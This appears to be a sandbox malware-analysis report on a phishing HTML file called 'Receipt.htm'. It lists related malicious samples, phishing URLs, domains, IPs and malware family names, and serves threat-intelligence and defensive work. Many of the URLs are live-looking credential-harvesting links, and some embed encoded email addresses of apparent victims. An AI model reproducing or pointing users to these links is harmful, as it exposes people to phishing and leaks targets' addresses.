Analysis stop reason:	Timeout
Sample name:	Receipt.htm
Detection:	MAL
Classification:	mal60.phis.evad.winHTM@33/202@76/23
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .htm

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.186.163, 142.250.186.46, 108.177.15.84, 34.104.35.123, 216.58.206.42, 172.217.16.202, 142.250.185.138, 142.250.181.234, 142.250.185.234, 142.250.186.42, 142.250.186.106, 142.250.185.170, 142.250.185.106, 142.250.185.202, 172.217.18.10, 142.250.74.202, 142.250.186.138, 142.250.185.74, 142.250.186.74, 142.250.184.202, 199.232.214.172, 192.229.221.95, 2.23.209.172, 2.23.209.139, 2.18.64.32, 2.18.64.22, 104.102.38.212, 184.27.96.174, 2.23.196.132, 142.250.186.99, 142.250.184.206
Excluded domains from analysis (whitelisted): e84128.dsca.akamaiedge.net, azurefd-t-fb-prod.trafficmanager.net, slscr.update.microsoft.com, otelrules.afd.azureedge.net, clientservices.googleapis.com, ip46s2.go-mpulse.net.edgekey.net, clients2.google.com, ocsp.digicert.com, update.googleapis.com, optimizationguide-pa.googleapis.com, e4518.dscx.akamaiedge.net, clients1.google.com, fs.microsoft.com, accounts.google.com, ajax.googleapis.com, otelrules.azureedge.net, ctldl.windowsupdate.com, e9858.dscx.akamaiedge.net, fe3cr.delivery.mp.microsoft.com, wildcard46.akstat.io.edgekey.net, prod-edge.kohls.com.edgekey.net, e4518.dscapi7.akamaiedge.net, edgedl.me.gvt1.com, wildcard46.go-mpulse.net.edgekey.net, san5-ion.scene7.com.edgekey.net, azureedge-t-prod.trafficmanager.net, clients.l.google.com, e118552.dscx.akamaiedge.net
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtSetInformationFile calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: Receipt.htm

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.35.58.129	ddsfsfsa.pdf	Get hash	malicious	Unknown	Browse
13.35.58.129	MSSHIFT Invoice 2.pdf	Get hash	malicious	Unknown	Browse
18.245.86.44	https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=act	Get hash	malicious	Unknown	Browse
	MSSHIFT Invoice 2.pdf	Get hash	malicious	Unknown	Browse
	http://pay.christinagstewart.com/	Get hash	malicious	Unknown	Browse
104.18.94.41	https://cruparcellaire-my.sharepoint.com/:u:/g/personal/dani_grandrcu_com/EffQlMxf6g9Hiljl1DzmuTcB4-lo0t9ejs2hIBwCnQfe1g?e=TtenDj	Get hash	malicious	Unknown	Browse
	http://wesiakkaernten.fibery.io/@public/forms/gBNXdAWE	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse
	http://wesiakkaernten.fibery.io/@public/forms/gBNXdAWE	Get hash	malicious	Unknown	Browse
	401K .pdf	Get hash	malicious	HTMLPhisher	Browse
	https://railrent-railrent.powerappsportals.com/	Get hash	malicious	Unknown	Browse
	http://etf-remittance-payout.s3.us-east-1.amazonaws.com/DMwNjk0MTU2LWI2MTItNDg5My04YmZhLWNhMzBjZTMzO/jZTMzODU5NwBGAAAAAAA/doc.html	Get hash	malicious	Unknown	Browse
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s553e3fe901654d86bcc4ed44c7c05dd3&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0V1a19QbFZsQVlaTnZNVHRSTWZBWGRNQmtvbDQ2b1NlN1o5MGFiazNzS3lGSlE_ZT1UMnQ4S3Y&wd=target%28Sezione%20senza%20titolo.one%7C8d7e5173-6006-4648-a69d-e39e66e7041a%2FAblehnung%20Rechnung%20R15946098273-KU30_WE02%20Vom%2028%5C%2F%7Cd77916b9-b471-429a-a13e-74764563e56b%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse
	https://mailhotcmhakamloops.wordpress.com/	Get hash	malicious	Unknown	Browse
	https://bioaquatictesting-my.sharepoint.com/:f:/g/personal/securedocument_bio-aquatic_com/EqfT1pjHkSVIsZ_uZ-FoAy4BgWwRj-5I-q_oaUpvi5Mxeg?e=eaqeTT	Get hash	malicious	Unknown	Browse
	http://assets.website-files.com/65f02117700897a29c49fb10/65f7c129cb837c2310c7044e_tisamijujute.pdf	Get hash	malicious	Unknown	Browse
18.66.122.78	https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=act	Get hash	malicious	Unknown	Browse
	MSSHIFT Invoice 2.pdf	Get hash	malicious	Unknown	Browse
	https://prepaidgiftcardcheck.com/mpc/	Get hash	malicious	Unknown	Browse
	https://auwebship.inxpress.com/imcs_au/shipment/tracking/by/airbill/view?airbillNumber=Q9TZ50011449	Get hash	malicious	Unknown	Browse
	https://ap.lc/FmoMp	Get hash	malicious	Unknown	Browse
	http://js.datadome.co/tags.js	Get hash	malicious	Unknown	Browse
	tps://concursystem.dsa-erie.com/?username=bob@ppg.com#/sap/oauth/authorize?client_id=0.098769150254675-0ff1-0.63411212881753&auth=10.22385834866383-0.5479973762054	Get hash	malicious	Unknown	Browse
	https://boring-mendel.91-208-92-12.plesk.page/	Get hash	malicious	Unknown	Browse
	Mainfreight.xlsx	Get hash	malicious	HTMLPhisher	Browse
151.101.130.137	http://mi-outlook-loggin.click/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://imaps-support.us/icloud2022-esp.php	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.11.3.min.js
	http://facebooksecurity.blogspot.ch/	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.min.js
	https://m.exactag.com/ai.aspx?tc=d9912543bc40b07205bbd26a23a8d2e6b6b4f9&url=http%253AING.shalominternationalministry.com/index.xml%23?email=amFtZXMubGVhZGJlYXRlckBsb2dpY2FsaXMuY29t	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-3.3.1.min.js
	http://site9613885.92.webydo.com/?v=1	Get hash	malicious	Unknown	Browse	code.jquery.com/jquery-1.7.2.min.js

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d2uyh1ncuzni57.cloudfront.net	https://alcatrazpackages.com/elchapo.html	Get hash	malicious	Unknown	Browse	18.244.18.27
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	18.244.18.27
	Jonathangodber October 2024.pdf	Get hash	malicious	Tycoon2FA	Browse	18.244.18.41
	ddsfsfsa.pdf	Get hash	malicious	Unknown	Browse	18.244.18.41
	http://www.doyoukera.com	Get hash	malicious	Unknown	Browse	18.155.129.67
	https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=act	Get hash	malicious	Unknown	Browse	18.244.18.13
	MSSHIFT Invoice 2.pdf	Get hash	malicious	Unknown	Browse	18.244.18.13
	https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=	Get hash	malicious	Unknown	Browse	18.244.18.13
	https://aumc.patientbillhelp.com/	Get hash	malicious	Unknown	Browse	13.249.98.106
	https://fdhaero.com	Get hash	malicious	GRQ Scam	Browse	13.224.103.30
s-part-0017.t-0009.t-msedge.net	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	13.107.246.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.246.45
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	13.107.246.45
	file.exe	Get hash	malicious	Credential Flusher	Browse	13.107.246.45
	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://onedrivefileaccess.uwu.ai/	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://www.leadsonline.ca	Get hash	malicious	Unknown	Browse	13.107.246.45
	https://joseordenes.com/n/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9TUZCc01WYz0mdWlkPVVTRVIyODEwMjAyNFUxOTEwMjgxMA==N0123N%5BEMAIL%5D	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.246.45
	http://wesiakkaernten.fibery.io/@public/forms/gBNXdAWE	Get hash	malicious	Unknown	Browse	13.107.246.45
	byamPER0Gx.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, Mofksys	Browse	13.107.246.45
s-part-0017.t-0009.fb-t-msedge.net	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	13.107.253.45
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.253.45
	https://www.leadsonline.ca	Get hash	malicious	Unknown	Browse	13.107.253.45
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.253.45
	https://joseordenes.com/n/?c3Y9bzM2NV8xX3ZvaWNlJnJhbmQ9TUZCc01WYz0mdWlkPVVTRVIyODEwMjAyNFUxOTEwMjgxMA==N0123N%5BEMAIL%5D	Get hash	malicious	HTMLPhisher, Mamba2FA	Browse	13.107.253.45
	http://xn--gba7iaacaabba0ab51nca04ecacdad9203oearjjb191bfa.mkto-sj030022.com	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://railrent-railrent.powerappsportals.com/	Get hash	malicious	Unknown	Browse	13.107.253.45
	https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s553e3fe901654d86bcc4ed44c7c05dd3&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0V1a19QbFZsQVlaTnZNVHRSTWZBWGRNQmtvbDQ2b1NlN1o5MGFiazNzS3lGSlE_ZT1UMnQ4S3Y&wd=target%28Sezione%20senza%20titolo.one%7C8d7e5173-6006-4648-a69d-e39e66e7041a%2FAblehnung%20Rechnung%20R15946098273-KU30_WE02%20Vom%2028%5C%2F%7Cd77916b9-b471-429a-a13e-74764563e56b%2F%29&wdorigin=NavigationUrl	Get hash	malicious	Unknown	Browse	13.107.253.45
	Transferencia.xls	Get hash	malicious	Unknown	Browse	13.107.253.45
	ORDEN7873097067.xlam.xlsx	Get hash	malicious	Unknown	Browse	13.107.253.45
d22rbd88eku03j.cloudfront.net	https://alcatrazpackages.com/elchapo.html	Get hash	malicious	Unknown	Browse	18.245.86.58
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	18.245.86.57
	Jonathangodber October 2024.pdf	Get hash	malicious	Tycoon2FA	Browse	18.245.86.57
	ddsfsfsa.pdf	Get hash	malicious	Unknown	Browse	18.245.86.57
	http://www.doyoukera.com	Get hash	malicious	Unknown	Browse	18.245.86.57
	https://purefitness.co.tz/coolimages/img/?action=validate&539=bWljaGFlbC5jaHVAbGNhdHRlcnRvbi5jb20=&r1=pending&r2=page&real=act	Get hash	malicious	Unknown	Browse	18.245.86.44
	MSSHIFT Invoice 2.pdf	Get hash	malicious	Unknown	Browse	18.245.86.44
	https://wtm.ventes-privees-du-jour.com/r/eNplj92OmzAQRp+GvQwYbGNfRBVNwgblh61I0jQ3kTEmOAXsgoFNnr6utFppVcnSSOd845mZXApCiJCbs5xhHwkaMq/EwEMCc1wCRjGl3MOeC0iAXArdEmJaepgUhBKOwoJCQIUgBJU+CwoB3NCFrnK/DfPKGN07QeT4sX3TNM0q1TRCd3IUM64aC2Xb805qI1XrBLENL33iewR4nu/4eDDNtVdDx4UVk6htjxh1cf9QjSjk0FjFdf2BOGs0k7f2v7xomKwt7VQuOuNAz4hatMLMcmEtH3pjs921lF1vWtb8Gxi1rfwia/bpfibb7WqXWVvr66gtcfzgmiyvtrwUfJ4+1qCs1GnU/YrCyR4TK60aFU3idQ8ntNjW9+hZoTo/m7dl4PjfT7UZq27RguCy3hwOoZ/CanOkZnFKm8Oe4SnLJU5uXnywf50j/fb0ft/+8Et0eC2nJEu3krdIqEyy22bEjzBN90n9rLTMyO7Ml8kK3n+dH7dwWhNYgGP6owiHUdD7eRVnLOlHu8Lx/ZJ2uwc/BY8jgXGUDvsXJueAIgDJX8NYskg=	Get hash	malicious	Unknown	Browse	18.245.86.31
	https://digitalentreprise.fr/	Get hash	malicious	Unknown	Browse	18.239.83.110
	https://aumc.patientbillhelp.com/	Get hash	malicious	Unknown	Browse	18.239.225.91

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
MIT-GATEWAYSUS	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	18.173.205.50
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	18.173.205.50
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	18.66.102.11
	W6Z9uSRsKQ.elf	Get hash	malicious	Unknown	Browse	18.160.223.99
	8v2IShmMos.elf	Get hash	malicious	Unknown	Browse	19.76.112.10
	B6eg13TpEH.elf	Get hash	malicious	Unknown	Browse	19.17.72.197
	vHnFyxemFf.elf	Get hash	malicious	Unknown	Browse	19.60.143.108
	https://alcatrazpackages.com/elchapo.html	Get hash	malicious	Unknown	Browse	18.66.122.43
	belks.arm7.elf	Get hash	malicious	Mirai	Browse	18.116.3.154
	belks.x86.elf	Get hash	malicious	Mirai	Browse	19.157.11.204
AMAZON-02US	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	52.216.77.118
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.38
	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	52.216.218.136
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	54.231.236.168
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	52.222.236.122
	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	13.32.121.40
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.38
	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.br/yaya/aALPghQuwJ38KMxdobOJdzxm/YW50b25lbGxhLmNvc3RhQGVzYS5pbnQ=	Get hash	malicious	Tycoon2FA	Browse	13.33.187.60
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.122
FASTLYUS	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	199.232.192.193
	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	199.232.196.193
	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	199.232.196.193
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	199.232.196.193
	Review_&_Aprove_Your_Next_Payroll84633.html	Get hash	malicious	Unknown	Browse	151.101.1.229
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	151.101.1.140
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.65.91
	https://cruparcellaire-my.sharepoint.com/:u:/g/personal/dani_grandrcu_com/EffQlMxf6g9Hiljl1DzmuTcB4-lo0t9ejs2hIBwCnQfe1g?e=TtenDj	Get hash	malicious	Unknown	Browse	151.101.1.229
	file.exe	Get hash	malicious	Credential Flusher	Browse	151.101.193.91
AMAZON-02US	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	52.216.77.118
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.38
	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	52.216.218.136
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	54.231.236.168
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	52.222.236.122
	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	13.32.121.40
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.38
	SecuriteInfo.com.Win32.SuspectCrc.28663.30359.exe	Get hash	malicious	FormBook	Browse	13.248.169.48
	https://www.google.im/url?q=38pQvvq6xRyj7Y00xDjnlx9kIHOSozurMOiaAkImPuQJnOIWtJjqJLi6stjtDz3yh&rct=tTPSrMOiaAkImPuQJnOIWtJjqJLi6stjtFX08pQvvq6xRyj7Y00xDjnlx9kIjusucT&sa=t&url=amp/s/cristorei.neemo.com.br/yaya/aALPghQuwJ38KMxdobOJdzxm/YW50b25lbGxhLmNvc3RhQGVzYS5pbnQ=	Get hash	malicious	Tycoon2FA	Browse	13.33.187.60
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	18.244.18.122
CLOUDFLARENETUS	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	104.18.91.62
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	172.64.41.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	104.18.90.62
	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	104.17.25.14
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	104.18.91.62
	Set-up.exe	Get hash	malicious	LummaC Stealer	Browse	172.67.145.203
	Review_&_Aprove_Your_Next_Payroll84633.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	162.247.243.29
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.53.206

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
28a2c9bd18a11de089ef85a160da29e4	weekly-finances-report.xlsx	Get hash	malicious	KnowBe4	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	https://token.onelogin.com-token-auth.com/XaFNXZmZxdFUzWDFPWVFxY2lia3BpYkY4UHdlcTNmZStWYjZidGFaMXFldkJJUk9VdmZTZVQxRk5QbVBlVFlJNGttbUlHcmViUysvaGcrWmRnbmwxLzZ6c0MrRWdVcEg1bHZtYnc4c2czNVlSUlhtdnRPc0gwWS9mZ3R4QTltZUZjdWZRZ1kvZmk0N2huS054TUFZUHJyNk4rNHcrNElWbjI0NWlrN2puRlNtYkx0ZzVhWExWcmpZbmt3PT0tLTFCMXhxTFNKS2ZOU3lIZTItLWtCRWhkMzBFQWZwNE0yN1QwM3BCT1E9PQ==?cid=2262276963	Get hash	malicious	KnowBe4	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	https://token.onelogin.com-token-auth.com/Xa0Y1MmVibVhmY0E5dnlabzhVK2w2MVo4bXZUM3RzTFBZU1FSUEYxRHlzb29tODRTUDQ4alBDR3Y1cWUvN1JvVzhtWGVkaHFaSG0rOVpUTVV1VjY2a3MvZDB6TktwTHhsRk9xdzQwQjV6YjIvcnA5MjFsaFJEamtNdXI5UXQ1Qm9lK0ZsZFd0TXI0R2JWWlVYeFFXa2pBaXZOKzR2QXRkUTd3dlBLNzUrQ1RweERVMmQ5ZHQwdjlKZ2dlS2tEVUF5UEE9PS0tdFFWWndQdklZQXNodTY1US0tUXAyU1llVHhDaXRTRjU1OVNWMXFNdz09?cid=2262276963	Get hash	malicious	KnowBe4	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	Review_&_Aprove_Your_Next_Payroll84633.html	Get hash	malicious	Unknown	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	https://www.guidedtrack.com/programs/n5snx1a/run	Get hash	malicious	Unknown	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	Setup.exe	Get hash	malicious	RedLine	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamics	Get hash	malicious	Unknown	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	https://onedrivefileaccess.uwu.ai/	Get hash	malicious	Unknown	Browse	13.107.253.45 184.28.90.27 20.12.23.50
	0T32Kz4dZU.exe	Get hash	malicious	Stealc, Vidar	Browse	13.107.253.45 184.28.90.27 20.12.23.50

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	1558
Entropy (8bit):	5.11458514637545
Encrypted:	false
SSDEEP:	48:OBOCrYJ4rYJVwUCLHDy43HV713XEyMmZ3teTHn:LCrYJ4rYJVwUCHZ3Z13XtdUTH
MD5:	EE002CB9E51BB8DFA89640A406A1090A
SHA1:	49EE3AD535947D8821FFDEB67FFC9BC37D1EBBB2
SHA-256:	3DBD2C90050B652D63656481C3E5871C52261575292DB77D4EA63419F187A55B
SHA-512:	D1FDCC436B8CA8C68D4DC7077F84F803A535BF2CE31D9EB5D0C466B62D6567B2C59974995060403ED757E92245DB07E70C6BDDBF1C3519FED300CC5B9BF9177C
Malicious:	false
Reputation:	high, very likely benign file
Preview:	// Copyright 2015 The Chromium Authors. All rights reserved..//.// Redistribution and use in source and binary forms, with or without.// modification, are permitted provided that the following conditions are.// met:.//.// * Redistributions of source code must retain the above copyright.// notice, this list of conditions and the following disclaimer..// * Redistributions in binary form must reproduce the above.// copyright notice, this list of conditions and the following disclaimer.// in the documentation and/or other materials provided with the.// distribution..// * Neither the name of Google Inc. nor the names of its.// contributors may be used to endorse or promote products derived from.// this software without specific prior written permission..//.// THIS SOFTWARE IS PROVIDED 